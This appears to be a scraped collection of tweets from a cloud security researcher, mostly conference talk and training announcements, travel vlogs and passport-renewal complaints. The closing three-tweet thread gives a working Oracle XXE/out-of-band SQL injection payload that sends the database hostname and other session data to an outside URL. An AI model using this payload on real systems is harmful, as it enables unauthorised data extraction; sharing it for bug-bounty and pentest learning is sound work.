White Knight Labs’ own @trouble1_raunak took the stage today at MCTTP in Munich, Germany, presenting: “From HTML Injection to Full AWS Account Takeover: Discovering Critical Risks in PDF Generation Features.” Thank you, Raunak, sharing your knowledge

Nice to meet the Indian hacker group at @MCTTP_Con including @trouble1_raunak. Going to miss his talk as we both are speaking at the same time ☹️

AzDevRecon – Turning Tokens into DevOps Portal One token = full Azure DevOps access. Repos, pipelines, creds. Blog: https://t.co/WG8jWl3YyZ 🎓 Learn to defend it: ASCPC at DEFCON, Aug 11–12 → https://t.co/wEGEFEuUiw

🛠️ Excited to feature @trouble1_raunak at Cloud Village @DEFCON 33! He’ll demo: “AzDevRecon – Azure DevOps Enumeration Tool” 🔍🚧 📍 Room 311, LVCC 🗓️ Aug 8 | 🕧 12:30–1:00 PM PT 🔗 https://t.co/GegDx80ygv #CloudVillage #ToolDemo #AzureDevOps #HackerSummerCamp #DEFCON33

Hackers target your CI/CD. Learn to fight back. @trouble1_raunak live at @defcon, Aug 11–12. $200 off: https://t.co/BCZOB27ZH9 Code: DCTLV25-WKL Cert + lifetime access included. https://t.co/JxFCsNWdgE

What an amazing stage setup, it was really a great experience delivering a talk at @_leHACK_ , Paris

@narendramodi @narendramodi_in @MEAIndia @CPVIndia @passportsevamea @PMOIndia @HMOIndia @rpomumbai @MumbaiPolice @ndtvindia @timesofindia I am extremely disappointed and frustrated with the Passport renewal process. It has been 3 months since I submitted my passport for renewal.

Why do police officer always ask for bribe (corruption) for the passport? @rpomumbai @MumbaiPolice

The Indian passport renewal process is an absolute nightmare! Been struggling for 2.5 months. The RPO sent my form with the old address again!🤦‍♂️ Why apply for a normal passport when the process is this broken? @MEAIndia @CPVIndia @passportsevamea @PMOIndia @HMOIndia @rpomumbai

I have started working on Beginner AWS Pentesting while learning to build before breaking it @trouble1_raunak thanks for motivation https://t.co/0MXYP7uiQd

https://t.co/9ppc0o8J9m

From Commerce to Apple journey Its not necessary to do iit for come from an IT background, what all is needed is the skill which can be gained from this free world

Vlog Defcon 2024 https://t.co/VPX7dqoGuj

Wanna learn and become pro in Azure Pentest? Check out Our on-demand Azure Training with 48 hrs of Exam which puts you in lots of challenges and allows you to open the door of Azure pentest.

Welcome to MCTTP 2024 Vlog! Join me as I embark on an unforgettable journey through Germany, starting with the @MCTTP_Con conference and then exploring the stunning cities of Munich, Julich, and Monschau #MCTTP2024 #cloudsecurity #azure #TravelVlog https://t.co/nRXmf4jJD4

Just another awesome Talk By Chirag & Raunak #mcttp

Real-World Azure Hack at #MCTTP2024! Our talk, "Hacker's Story from Reader to Global Admin," dives into how we escalated from a low-privilege Reader to Global Admin. Join us for exclusive insights and techniques used to exploit Azure. #AzureSecurity #CloudPentesting

[3/3] Similarly more data can also be extracted by using additional parameters: SYS_CONTEXT('USERENV', 'USER') SYS_CONTEXT('USERENV', 'INSTANCE_NAME') List of some more parameters: - SESSION_USER - OS_USER - HOST - IP_ADDRESS - SID - SESSIONID - LANGUAGE - TERMINAL

[2/3] a' || (SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % xxe SYSTEM " https://t.co/JfrbSaj4jS' || SYS_CONTEXT('USERENV', 'HOST') || '">%xxe;]>'), '/l') FROM dual) || ' #sqlinjection #pentesting #hacking #websec #bugbounty #manual

[1/3] Found a Crazy XXE/SQL injection while hunting a random web application. 💉XXE Injection via Out-Of-Band-SQL Injection in Oracle Based Database 😈 Below 💊 payload allowed me to get the Hostname by using 𝗦𝗬𝗦_𝗖𝗢𝗡𝗧𝗘𝗫𝗧 which is a in-built function in Oracle SQL.